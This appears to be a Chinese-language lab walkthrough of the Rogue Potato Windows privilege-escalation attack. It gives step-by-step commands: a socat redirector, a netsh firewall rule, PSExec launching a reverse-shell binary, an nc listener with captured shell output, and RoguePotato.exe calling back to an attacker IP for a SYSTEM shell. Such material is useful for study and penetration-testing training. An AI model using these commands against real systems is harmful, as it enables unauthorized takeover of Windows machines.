4:35当前帖子内容
Rogue Potato是使用欺骗攻击的攻击名称
同时进行NTLM中继攻击以获得系统权限
该攻击诱使Windows作为系统进行身份验证
用户使用NTLM访问一个假的HTTP服务器;NTLM凭据
然后NTLM凭据将其转告到SMB以获得命令执行
提权条件
1.本地NTLM中继获取SYSTEM令牌
2.SeImpersonatePrivilege特权
测试中任意用户都可以通过本地NTLM中继获取到SYSTEM令牌权限,但是由于USER默认不开户SeImpersonatePrivilege特权,无法模拟令牌创建进程无法执行命令,所以会导致很多Potato提权失败。
实操
查看是否具有Selmpersonate权限
whoami /all
whoami /priv
### 如果开启SeImpersonate权限,juicypotato的参数可以使用-t t
### 如果开启SeAssignPrimaryToken权限,juicypotato的参数可以使用-t u
### 如果均开启,可以选择-t *
### 如果均未开启,那么无法提权运行结果
SeImpersonatePrivilege Impersonate a client after authentication Enabled查看RPC默认端口是否为135
如果被修改(例如为111),juicypotato的参数可以使用-n 111
如果系统禁用了RPC,并不是一定无法提权,需要满足如下条件:
找到另一系统,能够以当前用户的权限进行远程RPC登录,此时juicypotato的参数可以使用-k
例如Win7、WIn8系统,默认配置下,允许135端口的入站规则即可进行远程RPC登录
添加防火墙规则允许135端口入站的命令如下:
netsh advfirewall firewall add rule name="135" protocol=TCP dir=in localport=135 action=allow在 Kali 上设置一个 socat 重定向器,将 Kali 135 端口转发到 Windows 上的 9999 端口:
sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.174.222:9999
在 Kali 上启动一个监听器。 使用通过以管理员用户身份登录 RDP 模拟获取服务帐户 shell,启动提升的命令提示符(右键单击 -> 以管理员身份运行)并使用 PSExec64.exe 触发 ”本地服务”帐户:
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\Users\user\Desktop\reverse.exe
监听并返回了shell
┌──(root㉿kali)-[~/桌面]
└─# nc -lnvp 6666
listening on [any] 6666 ...
connect to [10.11.33.165] from (UNKNOWN) [10.10.174.222] 49850
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\local service
C:\Windows\system32>
在 Kali 上启动另一个监听
在触发反弹回来的 shell 中(在反弹的shell上直接运行),运行 RoguePotato 漏洞以触发第二个以 SYSTEM 权限运行的反向 shell(相应地使用您的 Kali IP 更新 IP 地址):
C:\PrivEsc\RoguePotato.exe -r 10.11.33.165 -e "C:\Users\user\Desktop\reverse.exe" -l 9999
